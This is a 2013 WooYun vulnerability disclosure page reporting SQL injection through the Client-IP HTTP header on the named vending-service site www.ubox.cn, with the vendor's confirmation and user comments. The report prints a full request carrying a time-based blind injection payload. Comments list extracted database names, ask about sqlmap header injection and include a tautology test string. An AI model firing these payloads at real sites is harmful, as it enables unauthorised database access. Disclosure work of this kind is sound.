当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041610

漏洞标题:友宝在线##sql注入之http头部Client-IP

相关厂商:友宝在线

漏洞作者: PgHook

提交时间:2013-10-31 17:50

修复时间:2013-12-15 17:51

公开时间:2013-12-15 17:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-31: 细节已通知厂商并且等待厂商处理中
2013-11-01: 厂商已经确认,细节仅向厂商公开
2013-11-11: 细节向核心白帽子及相关领域专家公开
2013-11-21: 细节向普通白帽子公开
2013-12-01: 细节向实习白帽子公开
2013-12-15: 细节向公众公开

简要描述:

一般人都会放弃的。

详细说明:

首先对厂商表示抱歉,给你们造成了不好的影响。
漏洞站点:www.ubox.cn
post信息:

GET /apply/req2.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://www.ubox.cn:80/
Cookie: PHPSESSID=998fjt8152i70j3eitrgkamsi0
Host: www.ubox.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


漏洞字段:Client-IP

y1.jpg


漏洞证明:

y2.jpg


y3.jpg


修复方案:

。。。。。。

版权声明:转载请注明来源 PgHook@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-01 13:55

厂商回复:

感谢您对友宝安全的关注,希望以后继续提出宝贵意见

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-31 17:51 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    这个吊。。。。。http头?

  2. 2013-10-31 19:00 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    @淡漠天空 是的,http头部的Client-IP存在注入。

  3. 2013-10-31 19:15 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    真牛逼,

  4. 2013-10-31 19:17 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    洞主真犀利

  5. 2013-10-31 19:53 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    Client-IP这都行...持续关注!

  6. 2013-10-31 22:02 | 某熊 ( 实习白帽子 | Rank:36 漏洞数:5 )

    膜拜

  7. 2013-10-31 22:22 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

    犀利哥

  8. 2013-10-31 22:40 | 剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)

    没看懂。。

  9. 2013-11-01 10:39 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    @友宝在线 我这里注出来了5个,看看是不是都存在,应该不是误报,如果你不能复现可以找我。available databases [5]:[*] cy[*] fms[*] information_schema[*] mysql[*] performance_scg

  10. 2013-11-01 12:06 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    嗯, 存在。

  11. 2013-11-01 12:30 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    @hacker@sina.cn 你咋知道啊存在啊??????

  12. 2013-11-01 15:44 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @PgHook 日过

  13. 2013-12-16 00:06 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    楼主可否告诉我一下,sqlmap HTTP Header Injection 如何写sqlmap的参数?非常感谢哈~

  14. 2013-12-16 00:12 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    @CplusHua 请参考:https://www.evernote.com/shard/s40/sh/955601ad-140d-409c-a662-0c4ef258f476/5275a2d7423e83a4626fdb7bd4dc29cf

  15. 2013-12-19 08:32 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    @hacker@sina.cn thank you!

  16. 2013-12-19 08:34 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    @'%20or%20's'='s for test

  17. 2015-08-21 17:43 | 百米生活(乌云厂商)

    楼主请问下,client-ip整条注入语句怎么写啊

  18. 2015-08-21 17:44 | 百米生活(乌云厂商)

    我这里也发现了,但是不知道如何注入